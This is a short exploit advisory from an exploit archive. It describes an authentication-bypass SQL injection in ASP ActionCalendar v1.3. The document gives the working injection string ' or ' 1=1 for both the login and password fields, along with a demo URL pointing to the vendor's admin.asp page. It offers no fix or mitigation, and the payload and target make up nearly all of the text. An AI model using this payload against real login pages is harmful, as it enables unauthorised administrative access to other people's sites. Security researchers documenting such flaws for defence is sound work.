id: 4691
date: 01/16/2009
title: ASP ActionCalendar v.1.3 (Auth Bypass) SQL Injection Vulnerability
author: SuB-ZeRo
cves: 

==================================================================
ASP ActionCalendar v.1.3 (Auth Bypass) SQL Injection Vulnerability
==================================================================


* Founded By : SuB-ZeRo (WaLiD)

---------------------------------------------------------

vondor : www.warrenstudios.com

---------------------------------------------------------

Exploit Auth Bypass:



login: ' or ' 1=1

passw: ' or ' 1=1

----------------------------------------------------------

-[!]

Demo :

http://www.warrenstudios.com/actioncalendar/admin.asp

----------------------------------------------------------



#  0day.today [2023-03-27]  #